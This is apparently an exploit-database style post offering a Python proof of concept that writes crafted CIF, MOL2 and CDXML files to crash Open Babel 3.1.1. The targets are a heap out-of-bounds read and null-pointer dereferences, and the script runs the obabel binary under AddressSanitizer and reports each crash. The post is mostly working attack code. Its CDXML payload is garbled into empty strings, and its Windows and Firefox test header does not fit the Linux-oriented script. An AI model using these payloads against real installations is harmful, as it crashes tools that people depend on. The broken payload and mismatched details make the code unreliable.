============================================================================================================================================= | # Title : OpenBabel 3.1.1 Local Vulnerability Research & Crash Testing Framework | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://openbabel.org/index.html | ============================================================================================================================================= [+] Summary : This project is a local exploitation research and crash-detection framework designed to evaluate memory-safety weaknesses in Open Babel 3.1.1 under controlled laboratory conditions. [+] The framework: Generates specially crafted input files (CIF, MOL2, CDXML). Executes the target obabel binary with AddressSanitizer (ASAN) enabled. Detects and classifies memory-related crashes such as: Heap Buffer Overflow Segmentation Fault General ASAN memory violations [+] POC : #!/usr/bin/env python3 import subprocess import os import sys import signal import argparse import tempfile import time from typing import Dict, List, Optional, Tuple from dataclasses import dataclass from enum import Enum import logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S' ) logger = logging.getLogger(__name__) class VulnerabilityType(Enum): """Supported Vulnerability Types""" HEAP_OOB_READ = "heap_oob_read" NULL_PTR_MOL2 = "null_ptr_mol2" NULL_PTR_CDXML = "null_ptr_cdxml" @dataclass class ExploitConfig: """Exploit Configuration""" babel_path: str output_file: str = "NUL" if os.name == "nt" else "/dev/null" asan_options: str = "symbolize=1:abort_on_error=1:detect_leaks=0:detect_odr_violation=0" timeout: int = 5 verbose: bool = False class OpenBabelExploiter: """ It is a specialized classifier for Open Babel vulnerability exploitation. It generates malicious files and tests them against the target binary. """ def __init__(self, config: ExploitConfig): self.config = config self.env = {} self.setup_environment() def setup_environment(self): """Securely sets up environment variables""" self.env = os.environ.copy() self.env["ASAN_OPTIONS"] = self.config.asan_options babel_dir = os.path.dirname(os.path.abspath(self.config.babel_path)) lib_dir = os.path.abspath(os.path.join(babel_dir, "..", "lib")) self.env["BABEL_LIBDIR"] = lib_dir lib_path_key = "LD_LIBRARY_PATH" existing_path = self.env.get(lib_path_key) if existing_path: self.env[lib_path_key] = f"{existing_path}:{lib_dir}" else: self.env[lib_path_key] = lib_dir def check_binary(self) -> bool: """Verifies binary existence and execution permissions""" target = self.config.babel_path if not os.path.isfile(target): logger.error(f"Binary not found or is not a regular file: {target}") return False if not os.access(target, os.X_OK): logger.error(f"Binary does not have execution permissions: {target}") return False return True def generate_mol2_null_ptr(self) -> str: """Generates a malicious MOL2 file for NULL Pointer Dereference""" mol2_content = ( "@MOLECULE\n" "NULL_PTR_EXPLOIT\n" " 1 0 0 0 0\n" "SMALL\n" "USER_CHARGES\n\n" "@ATOM\n" " 1 C 0.0000 0.0000 0.0000 C.3 1 EXPLOIT 0.0000\n\n" "@BOND\n\n" "@SUBSTRUCTURE\n" " 1 EXPLOIT 1 TEMP 0 **** **** 0 ROOT\n\n" "@CHARGE\n" "2 0.5\n" ) fd, path = tempfile.mkstemp(suffix='.mol2', prefix='exploit_') with os.fdopen(fd, 'w') as f: f.write(mol2_content) return path def generate_cif_heap_oob(self) -> str: """Generates a malicious CIF file for Heap OOB Read""" symops = [f"'{i}*x, {i}*y, {i}*z'" for i in range(1, 21)] symops_str = '\n'.join(symops) cif_content = ( "data_EXPLOIT_HEAP_OOB\n" "_cell_length_a 10.0\n" "_cell_length_b 10.0\n" "_cell_length_c 10.0\n" "_cell_angle_alpha 90.0\n" "_cell_angle_beta 90.0\n" "_cell_angle_gamma 90.0\n" "loop_\n" "_space_group_symop_operation_xyz\n" f"{symops_str}\n" ) fd, path = tempfile.mkstemp(suffix='.cif', prefix='exploit_') with os.fdopen(fd, 'w') as f: f.write(cif_content) return path def generate_cdxml_null_ptr(self) -> str: """Generates a malicious CDXML file for NULL Pointer Dereference""" cdxml_content = ( '\n' '\n' ' \n' ' \n' ' \n' ' <_natom id="99999"/>\n' ' \n' ' \n' '' ) fd, path = tempfile.mkstemp(suffix='.cdxml', prefix='exploit_') with os.fdopen(fd, 'w') as f: f.write(cdxml_content) return path def create_payload(self, vuln_type: VulnerabilityType) -> Tuple[str, str]: """Creates exploit payload based on vulnerability type""" if vuln_type == VulnerabilityType.HEAP_OOB_READ: return self.generate_cif_heap_oob(), "cif" if vuln_type == VulnerabilityType.NULL_PTR_MOL2: return self.generate_mol2_null_ptr(), "mol2" if vuln_type == VulnerabilityType.NULL_PTR_CDXML: return self.generate_cdxml_null_ptr(), "cdxml" raise ValueError(f"Unsupported vulnerability type: {vuln_type}") def execute_exploit(self, file_path: str, file_ext: str) -> Dict: """Executes the exploit and analyzes output""" cmd = [self.config.babel_path, f"-i{file_ext}", file_path, "-osmi", "-O", self.config.output_file] result = { "vulnerability_triggered": False, "crash": False, "crash_type": "None", "execution_time": 0, "return_code": None } try: start_time = time.time() process = subprocess.run(cmd, env=self.env, capture_output=True, text=True, timeout=self.config.timeout) result["execution_time"] = time.time() - start_time result["return_code"] = process.returncode output = process.stderr + process.stdout if "ERROR: AddressSanitizer" in output: result["crash"] = True result["vulnerability_triggered"] = True result["crash_type"] = "Heap Buffer Overflow" if "heap-buffer-overflow" in output else "ASAN Error" elif process.returncode in (-signal.SIGSEGV, 139): result["crash"] = True result["vulnerability_triggered"] = True result["crash_type"] = "Segmentation Fault" except subprocess.TimeoutExpired: logger.error("Execution timeout expired.") except Exception as e: logger.error(f"Execution error: {e}") return result def run_all_exploits(self) -> Dict[str, Dict]: """Runs all available exploits sequentially""" results = {} for v_type in VulnerabilityType: logger.info(f"Testing vulnerability: {v_type.name}") file_path, ext = self.create_payload(v_type) res = self.execute_exploit(file_path, ext) results[v_type.value] = res self.cleanup(file_path) return results def cleanup(self, file_path: Optional[str]): """Removes temporary payload files""" if file_path and os.path.exists(file_path): try: os.unlink(file_path) except Exception as e: logger.warning(f"Failed to delete {file_path}: {e}") def display_report(results: Dict): print("\n" + "═"*65) print(f"{'Vulnerability ID':<20} | {'Status':<15} | {'Crash Detail':<25}") print("─"*65) for name, res in results.items(): status = " TRIGGERED" if res["vulnerability_triggered"] else " FAILED" print(f"{name:<20} | {status:<15} | {res['crash_type']:<25}") print("═"*65 + "\n") def print_banner(): banner = """ ╔══════════════════════════════════════════════════════════╗ ║ Open Babel 3.1.1 - Local Exploitation Framework ║ ║ Vulnerability Research & Testing Tool ║ ║ By indoushka ║ ╚══════════════════════════════════════════════════════════╝ """ print(banner) def parse_args(): parser = argparse.ArgumentParser(description="Open Babel Vulnerability Research Framework") parser.add_argument("-b", "--babel-path", default="./obabel", help="Path to obabel binary") parser.add_argument("-t", "--target", choices=['cif', 'mol2', 'cdxml', 'all'], default='all', help="Target exploit") parser.add_argument("-o", "--output", help="Output file (default: /dev/null or NUL)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output") return parser.parse_args() def main(): print_banner() args = parse_args() config = ExploitConfig(babel_path=args.babel_path, verbose=args.verbose) if args.output: config.output_file = args.output exploiter = OpenBabelExploiter(config) if not exploiter.check_binary(): logger.error("Binary check failed. Ensure Open Babel is built with ASAN.") sys.exit(1) try: if args.target == "all": logger.info("Starting automated exploitation sequence...") results = exploiter.run_all_exploits() display_report(results) else: v_map = { "cif": VulnerabilityType.HEAP_OOB_READ, "mol2": VulnerabilityType.NULL_PTR_MOL2, "cdxml": VulnerabilityType.NULL_PTR_CDXML } v_type = v_map[args.target] file_path, ext = exploiter.create_payload(v_type) res = exploiter.execute_exploit(file_path, ext) exploiter.cleanup(file_path) display_report({args.target: res}) except KeyboardInterrupt: logger.info("\nExploit interrupted by user.") sys.exit(0) if __name__ == "__main__": main() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================